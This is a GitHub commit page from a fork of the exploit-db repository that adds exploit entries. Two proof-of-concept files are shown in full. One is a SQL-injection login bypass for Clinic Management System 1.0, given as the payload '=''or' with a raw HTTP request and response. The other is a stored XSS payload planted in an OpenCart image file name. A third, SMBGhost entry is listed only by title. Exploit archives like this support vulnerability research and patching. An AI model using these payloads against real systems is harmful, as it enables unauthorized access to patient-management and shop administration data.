forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
3 changes to exploits/shellcodes Microsoft Windows - 'SMBGhost' Remote Code Execution Clinic Management System 1.0 - Authentication Bypass OpenCart 3.0.3.2 - Stored Cross Site Scripting (Authenticated)
- Loading branch information
Offensive Security
committed
Jun 3, 2020
1 parent
b68cd4f
commit 34b6293
Showing
4 changed files
with
573 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,42 @@ | ||
# Exploit Title: Clinic Management System 1.0 - Authentication Bypass | ||
# Google Dork: N/A | ||
# Date: 2020-06-02 | ||
# Exploit Author: BKpatron | ||
# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html | ||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip | ||
# Version: v1.0 | ||
# Tested on: Win 10 | ||
# CVE: N/A | ||
# my website: bkpatron.com | ||
|
||
# Vulnerability: Attacker can bypass login page and access to dashboard page | ||
# vulnerable file : login.php | ||
# Parameter & Payload: '=''or' | ||
# Proof of Concept: | ||
http://localhost/source%20code/login.php | ||
|
||
POST /source%20code/login.php HTTP/1.1 | ||
Host: localhost | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 | ||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | ||
Accept-Language: en-US,en;q=0.5 | ||
Accept-Encoding: gzip, deflate | ||
Content-Type: application/x-www-form-urlencoded | ||
Content-Length: 72 | ||
Referer: http://localhost/source%20code/login.php | ||
Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1 | ||
Connection: keep-alive | ||
Upgrade-Insecure-Requests: 1 | ||
user=admin&email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btn_login=: undefined | ||
|
||
HTTP/1.1 200 OK | ||
Date: Mon, 01 Jun 2020 19:52:17 GMT | ||
Server: Apache/2.4.39 (Win64) PHP/7.2.18 | ||
X-Powered-By: PHP/7.2.18 | ||
Expires: Thu, 19 Nov 1981 08:52:00 GMT | ||
Cache-Control: no-store, no-cache, must-revalidate | ||
Pragma: no-cache | ||
Content-Length: 4726 | ||
Keep-Alive: timeout=5, max=100 | ||
Connection: Keep-Alive | ||
Content-Type: text/html; charset=UTF-8 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,15 @@ | ||
# Exploit Title: OpenCart 3.0.3.2 - Stored Cross Site Scripting (Authenticated) | ||
# Date: 2020-06-01 | ||
# Exploit Author: Kailash Bohara | ||
# Vendor Homepage: https://www.opencart.com | ||
# Software Link: https://www.opencart.com/index.php?route=cms/download | ||
# Version: OpenCart < 3.0.3.2 | ||
# CVE : CVE-2020-10596 | ||
|
||
1. Go to localhost.com/opencart/admin and login with credentials. | ||
|
||
2. Then navigate to System>Users>Users and click on Action button on top right corner. | ||
|
||
3. Now in image field , click on image and upload a new image. Before this select any image file and rename with this XSS payload "><svg onload=alert("XSS")> and then upload it as new user profile image. | ||
|
||
4. After the upload completes the XSS pop-up executes as shown below and it will gets executed each time someone visits the Image manager section. |
Oops, something went wrong.